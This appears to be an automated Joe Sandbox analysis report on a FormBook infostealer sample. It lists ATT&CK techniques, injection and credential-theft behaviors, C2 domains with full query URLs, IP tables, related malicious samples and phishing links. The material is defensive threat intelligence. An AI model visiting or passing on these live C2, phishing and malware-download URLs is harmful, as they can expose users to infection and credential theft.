Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 2 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1549349, sample r6lOHDg9N9.exe, start date 05/11/2024, architecture WINDOWS, score 100). Legend of the original graph: nodes are processes, signatures, created files and DNS/IP info; flags mark dropped files, Windows processes, malicious nodes and Internet contact; the number after a process name is the graph's created-files / created-registry-values badge; node colour encodes the compiler (Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language).

Start
    Contacted domains: www.030002304.xyz; www.wcm50.top; 15 other IPs or domains
        - Performs DNS queries to domains with low reputation
    Signatures at start: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
    r6lOHDg9N9.exe (1) started
        - Writes to foreign memory regions
        - Maps a DLL or memory area into another process
        - Switches to a custom stack to bypass stack traces
        - Contains functionality to detect sleep reduction / modifications
        svchost.exe started
            - Maps a DLL or memory area into another process
            fZXsbVktlmkz.exe injected
                - Found direct / indirect Syscall (likely to bypass EDR)
                write.exe (13) started
                    - Tries to steal Mail credentials (via file / registry access)
                    - Tries to harvest and steal browser information (history, passwords, etc)
                    - Modifies the context of a thread in another process (thread injection)
                    - 3 other signatures
                    fZXsbVktlmkz.exe injected
                        - Found direct / indirect Syscall (likely to bypass EDR)
                        dalong.site 172.96.187.60, ports 55740, 55741, 55742 (SINGLEHOP-LLCUS, Canada)
                        www.onemart.site 209.74.95.29, ports 55564, 55578, 55594 (MULTIBAND-NEWHOPEUS, United States)
                        7 other IPs or domains
                    firefox.exe started

            SourceDetectionScannerLabelLink
            r6lOHDg9N9.exe66%ReversingLabsWin32.Backdoor.FormBook
            r6lOHDg9N9.exe100%AviraTR/AVI.FormBook.yteeb
            r6lOHDg9N9.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.onemart.site/frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E=0%Avira URL Cloudsafe
            https://htmlcodex.com0%Avira URL Cloudsafe
            http://www.dverkom.store/p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw=0%Avira URL Cloudsafe
            http://www.wcm50.top/4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.dalong.site/s20z/0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.komart.shop/8r0w/0%Avira URL Cloudsafe
            http://www.030002304.xyz/jkxr/100%Avira URL Cloudmalware
            http://www.onemart.site/frpa/0%Avira URL Cloudsafe
            http://www.polarmuseum.info0%Avira URL Cloudsafe
            http://www.030002304.xyz/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=100%Avira URL Cloudmalware
            http://www.dalong.site/s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.polarmuseum.info/9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/tpid/0%Avira URL Cloudsafe
            http://www.polarmuseum.info/9u26/0%Avira URL Cloudsafe
            http://www.dverkom.store/p6ze/0%Avira URL Cloudsafe
            http://www.teerra.shop/szao/0%Avira URL Cloudsafe
            https://htmlcodex.com/credit-removal0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            komart.shop
            133.130.35.90
            truetrue
              unknown
              www.onemart.site
              209.74.95.29
              truetrue
                unknown
                www.polarmuseum.info
                13.248.169.48
                truetrue
                  unknown
                  zhs.zohosites.com
                  136.143.186.12
                  truefalse
                    high
                    wcm50.top
                    154.23.184.60
                    truetrue
                      unknown
                      www.030002304.xyz
                      161.97.142.144
                      truetrue
                        unknown
                        dalong.site
                        172.96.187.60
                        truetrue
                          unknown
                          target.flexifunnels.com
                          104.16.6.253
                          truetrue
                            unknown
                            www.dverkom.store
                            31.31.196.17
                            truetrue
                              unknown
                              teerra.shop
                              3.33.130.190
                              truetrue
                                unknown
                                www.dalong.site
                                unknown
                                unknowntrue
                                  unknown
                                  www.teerra.shop
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.komart.shop
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.everycreation.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.wcm50.top
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.growdigitally.net
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.lanxuanz.tech
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.onemart.site/frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E=true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.dalong.site/s20z/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.lanxuanz.tech/tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.komart.shop/8r0w/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.dverkom.store/p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw=true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.wcm50.top/4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.onemart.site/frpa/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.030002304.xyz/jkxr/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.lanxuanz.tech/tpid/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.polarmuseum.info/9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.dverkom.store/p6ze/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.dalong.site/s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.030002304.xyz/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.polarmuseum.info/9u26/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.teerra.shop/szao/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://htmlcodex.comwrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/chrome_newtabwrite.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/ac/?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.jsdelivr.net/npm/bootstrapwrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    high
                                                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.csswrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      https://www.zoho.com/sites/images/professionally-crafted-themes.pngwrite.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        http://www.polarmuseum.infofZXsbVktlmkz.exe, 00000007.00000002.3554169610.0000000004A7C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://code.jquery.com/jquery-3.4.1.min.jswrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.techwrite.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.jsdelivr.net/npm/bootstrap-iconswrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbwrite.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://htmlcodex.com/credit-removalwrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            209.74.95.29
                                                                            www.onemart.siteUnited States
                                                                            31744MULTIBAND-NEWHOPEUStrue
                                                                            136.143.186.12
                                                                            zhs.zohosites.comUnited States
                                                                            2639ZOHO-ASUSfalse
                                                                            13.248.169.48
                                                                            www.polarmuseum.infoUnited States
                                                                            16509AMAZON-02UStrue
                                                                            161.97.142.144
                                                                            www.030002304.xyzUnited States
                                                                            51167CONTABODEtrue
                                                                            172.96.187.60
                                                                            dalong.siteCanada
                                                                            32475SINGLEHOP-LLCUStrue
                                                                            133.130.35.90
                                                                            komart.shopJapan7506INTERQGMOInternetIncJPtrue
                                                                            31.31.196.17
                                                                            www.dverkom.storeRussian Federation
                                                                            197695AS-REGRUtrue
                                                                            3.33.130.190
                                                                            teerra.shopUnited States
                                                                            8987AMAZONEXPANSIONGBtrue
                                                                            154.23.184.60
                                                                            wcm50.topUnited States
                                                                            174COGENT-174UStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549349
Start date and time: 2024-11-05 15:21:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: r6lOHDg9N9.exe (renamed because the original name is a hash value)
Original Sample Name: bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@11/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 41
• Number of non-executed functions: 314
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target fZXsbVktlmkz.exe, PID 1228 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: r6lOHDg9N9.exe
Time       Type              Description
09:23:18   API Interceptor   5723356x Sleep call for process: write.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            209.74.95.29PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/
                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            POPO00003964.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/?86_x=PbxAaK8rSTbGZ+BXmINHlCmvDMYzd7cnW5ERHNgbkCm+3sg74DzBCzS1WsCQlDZBoOF+IY6Xn812UFXfTFX6/xo/4S63CIRytf8/LKIAqG5Hdl7pUAMfsfg=&bVi=_BPd
                                                                            YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/
                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.onetoph.xyz/h5ax/
                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/
                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            136.143.186.12Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/1q08/
                                                                            jeez.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/m8yb/
                                                                            PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/1q08/
                                                                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            x.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/em49/
                                                                            bin.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/em49/
                                                                            PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                            • www.jrksa.info/nq8t/
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.polarmuseum.inforHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
payment copy.exe | malicious | FormBook
• 199.59.243.227
zhs.zohosites.com | Purchase_Order_pdf.exe | malicious | FormBook
• 136.143.186.12
jeez.exe | malicious | FormBook
• 136.143.186.12
PURCHASE ORDER.exe | malicious | FormBook
• 136.143.186.12
z4Shipping_document_pdf.exe | malicious | FormBook
• 136.143.186.12
NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook
• 136.143.186.12
DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook
• 136.143.186.12
PROFOMA INVOICE SHEET.exe | malicious | FormBook
• 136.143.186.12
x.exe | malicious | FormBook
• 136.143.186.12
bin.exe | malicious | FormBook
• 136.143.186.12
PR44238-43433.exe | malicious | FormBook
• 136.143.186.12
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02 US | Employee bonus and payroll 74ae5652.pdf | malicious | HTMLPhisher, Mamba2FA
• 18.245.31.89
https://bulbapp.com/u/sharefile?sharedLink=1db1fe96-5bdb-4c8c-ba45-33caa906abdd | malicious | HTMLPhisher
• 143.204.98.63
Eveshaw.pdf | malicious | Unknown
• 18.239.69.9
https://bitbucket.org/thanksforusingourwebsite/serv/downloads/Statement-415322025.exe | malicious | ScreenConnect Tool
• 185.166.143.50
https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2e | malicious | Unknown
• 76.223.1.166
https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9 | malicious | Unknown
• 34.213.87.83
https://forms.office.com/e/wqvhAuyrVU | malicious | HTMLPhisher
• 13.32.118.71
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
• 18.244.18.38
https://t.ly/Oppenheim0511 | malicious | GO Backdoor
• 185.166.143.49
https://load.contbot.com.br/ | malicious | Unknown
• 76.76.21.21
ZOHO-AS US | Purchase_Order_pdf.exe | malicious | FormBook
• 136.143.186.12
https://workdrive.zohoexternal.com/file/d3qaw4673940b54374623b165953068c580b5 | malicious | HTMLPhisher
• 136.143.191.16
la.bot.powerpc.elf | malicious | Unknown
• 165.173.254.237
https://www.pumpproducts.com/goulds-lb0735te-centrifugal-booster-pump-3-4-hp-208-230-460-volts-3-phase-1-1-4-npt-suction-1-npt-discharge-18-gpm-max-176-ft-max-head-5-impeller-tefc-stainless-steel-pump-end-casing.html | malicious | Unknown
• 136.143.190.172
https://www.google.hn/url?q=//www.google.ee/amp/s/h2f35e7.ubpages.com/bdeda8-f4eb-4ed8-b | malicious | HTMLPhisher
• 136.143.190.123
https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCE | malicious | Unknown
• 136.143.182.97
https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCE | malicious | Unknown
• 136.143.182.97
https://u47624652.ct.sendgrid.net/ls/click?upn=u001.dadsJCAJAl1i2Wyni-2FqIpB7JUgY2pex5g8M-2FhOTGFFHwo5sWgFDjcqy2L0OmonoaOFxcTz7SSB9Zef6mGbvSbZAXZK2FNhcmYdYC1XfrewJRXTzEzFwzmIj8nJoazHaAQVwyvlny49OkXm-2FDzbhWD3cqi52XZmuHNJ5erV06gLBXVvtoQCYY0OMkrHePY-2F9kOmRiOc8fRxBlNxNWWJDbU4O9z5P8IfXhDPiFYyln4kg-3DMEyt_ta3c1LGL-2F0rVfKZ7mVrwN6xsF1Wes8l2L7kiutKf8O1vhXHOMQAk657ifMzrLT5hR0wjO0bDDWiSyPYBMWem2YqbQ4hjbtaf8R6UfuK7GvGuvaOArNf0yRKKyAsKfoVrlXUbmkgYGBk7NXAN8n11wXOM8RDTicUs3dK12Mnhp63jlPtSTpECLklTQMdoXlI5m8IncC-2BD2wJgWDFrBq8JEg-3D-3D | malicious | HTMLPhisher
• 204.141.42.123
https://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfac | malicious | HTMLPhisher
• 136.143.182.97
jeez.exe | malicious | FormBook
• 136.143.186.12
MULTIBAND-NEWHOPE US | 09Iz0ja549.exe | malicious | FormBook
• 209.74.64.190
En88bvC0fc.exe | malicious | FormBook
• 209.74.64.187
mBms4I508x.exe | malicious | FormBook
• 209.74.64.189
PO-000172483.exe | malicious | FormBook
• 209.74.64.190
COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook
• 209.74.64.58
MV Sunshine.exe | malicious | FormBook
• 209.74.64.58
VkTNb6p288.exe | malicious | FormBook
• 209.74.64.187
#10302024.exe | malicious | FormBook
• 209.74.64.58
http://1lyiqb.recodifyphone.net/#john.smith@ups.com | malicious | EvilProxy, HTMLPhisher
• 209.74.95.101
Biocon-In-Service Agreement.pdf | malicious | EvilProxy, HTMLPhisher
• 209.74.95.101
CONTABO DE | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | malicious | FormBook
• 161.97.142.144
REVISED PO NO.8389.exe | malicious | AgentTesla
• 164.68.127.9
COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook
• 161.97.142.144
evhopi.ps1 | malicious | LummaC
• 173.249.62.85
Payload 94.75.225.exe | malicious | Unknown
• 161.97.132.254
https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.html | malicious | LummaC
• 173.249.62.84
Ponta Saheb. PO 4400049817.exe | malicious | FormBook
• 161.97.142.144
New Order list attached.exe | malicious | DBatLoader, FormBook
• 161.97.168.245
A4mmSHCUi2.exe | malicious | FormBook
• 161.97.142.144
VkTNb6p288.exe | malicious | FormBook
• 161.97.142.144
                                                                            No context
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\write.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):287744
                                                                            Entropy (8bit):7.994949598457176
                                                                            Encrypted:true
                                                                            SSDEEP:6144:yKFK1UgOExwPWioLF7AmbrPn6kPsRNuXtMtaBP5ix58xF:yxbxVL1zrPN0/0tjiWF
                                                                            MD5:074E4506270BBB0EE4A0A262B68FBFF8
                                                                            SHA1:B06AE4F399E47C2AB07DD936E7316C5B7C1FC4DC
                                                                            SHA-256:64381E9DEAD1108CD35A33718B3FB0CD69CA4DCEDB653EB06D44C8683558A1FF
                                                                            SHA-512:812A75C829D4322E182ED836889509DA7D6CFBEE3787B7E792E2D7DD1B7FB4F81F54D2991ECA11BFDFF2BBA2131BA85BEBBEAE3F98DC436E4C020AF2B926B647
                                                                            Malicious:false
                                                                            Reputation:low
